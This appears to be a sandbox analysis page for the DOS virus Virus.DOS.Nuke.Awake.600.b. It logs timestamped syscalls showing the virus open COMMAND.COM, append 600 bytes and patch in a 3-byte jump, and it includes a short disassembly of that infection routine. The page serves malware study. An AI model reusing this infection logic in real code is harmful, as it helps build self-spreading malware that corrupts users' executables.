Sample viewer

vx.netlux.org/Virus.DOS.Nuke.Awake.600.b

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T21:51:01.949552382Z 250 PC: 13b99 | UNKNOWN!
2018-12-17T21:51:01.951050936Z 47 PC: 13ba7 | Get disk transfer address
2018-12-17T21:51:01.952873322Z 26 PC: 13bb9 | Set disk transfer address
2018-12-17T21:51:01.954641115Z 25 PC: 13bc8 | Get default drive
2018-12-17T21:51:01.956431509Z 14 PC: 13bd2 | Set default drive (Drive = 'C')
2018-12-17T21:51:01.958523251Z 78 PC: 13bdf | Find first file
2018-12-17T21:51:01.964272547Z 67 PC: 13c0c | Get or set file attributes
2018-12-17T21:51:01.969865076Z 67 PC: 13c19 | Get or set file attributes
2018-12-17T21:51:02.321306978Z 61 PC: 13c21 | Open file (Filename = 'COMMAND.COM')
2018-12-17T21:51:02.328263768Z 87 PC: 13c28 | Get or set file date and time
2018-12-17T21:51:02.331505622Z 44 PC: 13c36 | Get time 0x13c36: or dl, dl
0x13c38: je 0x13c32
0x13c3a: mov byte ptr [bp + 0x252], dl
0x13c3e: mov ah, 0x3f
0x13c40: lea dx, word ptr [bp + 0x162]
0x13c44: mov cx, 3
0x13c47: int 0x21
0x13c49: mov ax, 0x4202
0x13c4c: sub cx, cx
0x13c4e: sub dx, dx
0x13c50: int 0x21
0x13c52: sub ax, 3
0x13c55: mov word ptr cs:[0xfb2d], ax
0x13c59: mov byte ptr cs:[0xfb2c], 0xe9
0x13c5f: lea si, word ptr [bp - 3]
0x13c62: nop
0x13c63: mov di, 0xfcbc
0x13c66: mov cx, 0x258
0x13c69: cld
0x13c6a: rep movsb byte ptr es:[di], byte ptr [si]
2018-12-17T21:51:02.333997884Z 63 PC: 13c49 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T21:51:02.336937623Z 66 PC: 13c52 | Move file pointer
2018-12-17T21:51:02.340839138Z 64 PC: 13c7c | Write file or device (Write 600 bytes on handle 5)
2018-12-17T21:51:02.351396165Z 66 PC: 13c85 | Move file pointer
2018-12-17T21:51:02.352674998Z 64 PC: 13c8f | Write file or device (Write 3 bytes on handle 5)
2018-12-17T21:51:02.355639128Z 87 PC: 13ca4 | Get or set file date and time
2018-12-17T21:51:02.357345648Z 62 PC: 13ca8 | Close file
2018-12-17T21:51:02.363161119Z 67 PC: 13cb5 | Get or set file attributes
2018-12-17T21:51:02.384693549Z 26 PC: 13cc4 | Set disk transfer address
2018-12-17T21:51:02.386259243Z 14 PC: 13cce | Set default drive (Drive = 'A')
2018-12-17T21:51:02.38784993Z 9 PC: 12a47 | Display string (String= 'GOAT File Generator 1.00 � (c) 1994-96 by ROSE, Ralph Roth! (16.12.1996) File: ROSE009.COM - 4.400 (1130h) Bytes length! ')